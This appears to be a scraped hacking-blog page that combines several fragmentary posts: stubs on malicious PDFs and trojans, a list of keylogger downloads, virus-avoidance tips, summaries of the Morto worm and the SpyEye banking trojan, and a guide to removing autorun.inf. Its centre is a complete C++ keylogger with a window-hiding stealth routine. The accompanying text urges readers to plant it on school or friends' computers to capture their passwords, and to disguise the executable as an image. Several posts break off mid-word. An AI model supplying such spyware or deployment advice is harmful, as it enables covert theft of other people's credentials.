How to create a malicious/infected PDF File

...................................................................................................................................................
Creating A Malicious/Infected Pdf File
--------------------------------------------------------------------------------------------------------------------------

How to create a Trojan in C++

In today's tutorial I am going to teach you how to make a trojan. The main motive is to show you how trojan works.

12 Tips To Maintain A Virus Free Computer

Is your computer infected with virus? Do you often get mysterious error messages? Well this is a common problem faced by almost all the computer users across the globe. There are many viruses and worms out there that could infect your computer. Some are harmless, but, they do have the capacity to do any number of nasty things, up to and including, erasing all data from your computer. However there are ways to keep viruses away from your PC. Here are the 12 tips to maintain a virus free computer.

1. Email is one of the common ways by which your computer can catch a virus. So it is always recommended to stay away from SPAM. Open only those emails that has it’s ori

New list of free keyloggers

1. Ardamax 2.8 Keylogger
Download link: http://uploading.com/files/a62debf3/Ardamax_2.8.zip/

2. Blac

Create Keylogger using C++|Basic Hacking Tutorials Learn To create Keylogger using C++|Basic Hacking Tutorials

Hi friends, the most interesting part  of the hacking is spying.  Today i am going to introduce to the C++ Spyware code.   It is going to be very fun.  You can install this spyware in your college/school  or in your friend system, and get their username and passwords.  This is very simple hacking trick when compared to phishing web page.


Disadvantage of Phishing Web page:
you have to upload phishing web page to web hosting.  But only few website won't detect the phishing webpage.
website url is different. Easy to detect that we are hacking.

Advantage of Spyware-keylogger:
Very simple and easy method.
Victim can't detect that we are hacking.

How to create Keylogger using Visual C++?
Requirements:
Dev C++.  Download it from here: http://www.bloodshed.net/
Knowledge about Visual C++(need, if you are going to develop the code).

Install dev C++ in your system and open the dev C++ compiler.
Go to File->New->Source File.
you can see a blank works space will be there in window.
now copy the below keylogger code into the blank work space.

#include
using namespace std;
#include
#include
int Save (int key_stroke, char *file);
void Stealth();

int main()
{
Stealth();
char i;

while (1)
{
for(i = 8; i <= 190; i++)
{
if (GetAsyncKeyState(i) == -32767)
Save (i,"LOG.txt");
}
}
system ("PAUSE");
return 0;
}

/* *********************************** */

int Save (int key_stroke, char *file)
{
if ( (key_stroke == 1) || (key_stroke == 2) )
return 0;

FILE *OUTPUT_FILE;
OUTPUT_FILE = fopen(file, "a+");

cout << key_stroke << endl;

if (key_stroke == 8)
fprintf(OUTPUT_FILE, "%s", "[BACKSPACE]");
else if (key_stroke == 13)
fprintf(OUTPUT_FILE, "%s", "\n");
else if (key_stroke == 32)
fprintf(OUTPUT_FILE, "%s", " ");
else if (key_stroke == VK_TAB)
fprintf(OUTPUT_FILE, "%s", "[TAB]");
else if (key_stroke == VK_SHIFT)
fprintf(OUTPUT_FILE, "%s", "[SHIFT]");
else if (key_stroke == VK_CONTROL)
fprintf(OUTPUT_FILE, "%s", "[CONTROL]");
else if (key_stroke == VK_ESCAPE)
fprintf(OUTPUT_FILE, "%s", "[ESCAPE]");
else if (key_stroke == VK_END)
fprintf(OUTPUT_FILE, "%s", "[END]");
else if (key_stroke == VK_HOME)
fprintf(OUTPUT_FILE, "%s", "[HOME]");
else if (key_stroke == VK_LEFT)
fprintf(OUTPUT_FILE, "%s", "[LEFT]");
else if (key_stroke == VK_UP)
fprintf(OUTPUT_FILE, "%s", "[UP]");
else if (key_stroke == VK_RIGHT)
fprintf(OUTPUT_FILE, "%s", "[RIGHT]");
else if (key_stroke == VK_DOWN)
fprintf(OUTPUT_FILE, "%s", "[DOWN]");
else if (key_stroke == 190 || key_stroke == 110)
fprintf(OUTPUT_FILE, "%s", ".");
else
fprintf(OUTPUT_FILE, "%s", &key_stroke);

fclose (OUTPUT_FILE);
return 0;
}

/* *********************************** */

void Stealth()
{
HWND Stealth;
AllocConsole();
Stealth = FindWindowA("ConsoleWindowClass", NULL);
ShowWindow(Stealth,0);
}

Compile the Code(Ctrl+F9)

Now execute the program by selecting Execute->Run(ctrl+F10)

now your keylogger will run in your system. whatever you type using keyboard. It will be stored in Log.txt file.
you can see the log.txt file where you save the file.

bind the exe file with image or any files and send it to your friend.
(0r)
if you have physical access to your college/school system,then copy the exe file in that system and run it.

For now, i just give simple keylogger. Soon i will post most efficient keylogger's program code.

Windows Remote Desktop Worm “Morto” Spreading

F-Secure Lab just found a new Internet worm, and it’s spreading in the wild. The worm is called Morto and it infects Windows workstations and servers. It uses a new spreading vector that we haven’t seen before: RDP (Remote Desktop Protocol). Windows has built-in support for this protocol via Windows Remote Desktop Connection. Once you enable a computer for remote use, you can use any other computer to access it.

When you connect to another computer with this tool, you can remotely use the computer, just like you’d use a local computer.

Once a machine gets infected, the Morto worm starts scanning the local network for machines that have Remote Desktop Connection enabled. This creates a lot of traffic for port 3389/TCP, which is the RDP port.
When Morto finds a Remote Desktop server, it tries logging in as Administrator and tries a series of passwords:
admin
password
server
test
user
pass
letmein
1234qwer
1q2w3e
1qaz2wsx
aaa
abc123
…….
………..
Once you are connected to a remote system, you can access the drives of that server via Windows shares such as \\tsclient\c and \\tsclient\d for drives C: and D:, respectively. Morto uses this feature to copy itself to the target machine. It does this by creating a temporary drive under letter A: and copying a file called a.dll to it.
The infection will create several new files on the system including \windows\system32\sens32.dll and
\windows\offline web pages\cache.txt.
Morto can be controlled remotely. This is done via several alternative servers, including jaifr.com and qfsl.net.
F-Secure Lab detected Morto components as Backdoor:W32/Morto.A and Worm:W32/Morto.B.

SpyEye Banking Trojan – Now with SMS Hijacking Capability

The Trusteer research team recently uncovered a stealth new attack carried out by the SpyEye Trojan that circumvents mobile SMS (short message service) security measures implemented by many banks. Using code captured while protecting a Rapport user, researchers discovered a two-step web-based attack that allows fraudsters to change the mobile phone number in a victim’s online banking account and reroute SMS confirmation codes used to verify online transactions. This attack, when successful, enables the thieves to make transactions on the user’s account and confirm the transactions without the user’s knowledge.
Step 1:
In the first step of the attack, SpyEye steals the victim’s online banking login details. This is standard operating procedure for financial malware like SpyEye, Zeus, and others. The fraudsters can now access the victim’s account without raising any red flags that would be picked up by fraud detection systems.
Step 2:
In Step 2, SpyEye changes the victim’s phone number of record in the online banking application to one of several random attacker controlled numbers. In order to complete this operation the attacker needs the confirmation code which is sent by the bank to the customer’s original phone number. To steal this confirmation code the attacker uses the following social engineering scheme.
First, SpyEye injects a fraudulent page in the customer’s browser that appears to be from the online banking application. The fake page purports to introduce a new security system that is now “required” by the bank and for which customers must register. The page explains that under this new security process the customer will be assigned a unique telephone number and that they will receive a special SIM card via mail. Next, the user is instructed to enter the personal confirmation number they receive on their mobile telephone into the fake web page in order to complete the registration process for the new security system. This allows the criminals to steal the confirmation code they need to authorize changing the customer’s mobile number.
Now the fraudsters can receive all future SMS transaction verification codes for the hijacked account via their own telephone network. This allows them to use the SMS confirmation system to divert funds from the customer’s account without their knowledge, while not triggering any fraud detection alarms.

Remove autorun virus

Once it happened to a friend of mine, when his newly bought laptop was infected with this autorun.inf virus. This virus corrupted almost all the  drives on the Hard disk, and when ever he tried to double click on the drive or opening  any drive it opened in a new window. In some cases, when your drive is infected with this Autorun.inf virus, you won’t be able to access the drive completely. You have to browse the drive by Exploring it i.e; Ctrl+E keys from the keyboard.

Sometimes ever you will not be able to see hidden files even if you have Show hidden files Enabled under Folder Options. well, this are all the wonders of this Autorun.inf virus.

I am going to show you this rare method of removing Autorun.inf manually using just winrar application, not any antivirus or malware programs.

Solution to Remove Autorun.inf Virus

Step 1: First Disable CD/DVD or USB Autorun in windows

Step 2: Open Winrar.exe  (Start–>All Programs–>WinRar–>WinRar.exe)

Step 3: Now Browse to any drive that is infected with Autorun.inf virus using winrar explorer.

Step4: Here you will see all the hidden files under winrar for that particular drive.

Step 5: Look for the file Autorun.inf and open it using notepad.

Step 6: In that Autorun file, some .EXE file will be mentioned that will be executed along with the autorun file. This exe file is the main culprit.

Step 7: Note the exe file mentioned in the Autorun.inf file. Close this Autorun.inf file.

Step 8: Now look for that .Exe file in the drive (Ex: c:/), Delete that .exe file along with Autorun.inf

Step 9: Restart your Operating System. Now your system is free with Autorun.inf Virus.

Note: Repeat the same process if your Usb or Pendrives are infected with Autorun.inf virus.

If you know anyother method to remove autorun virus from windows operating system, them kindly let me know by posting your method using the Comments on this post.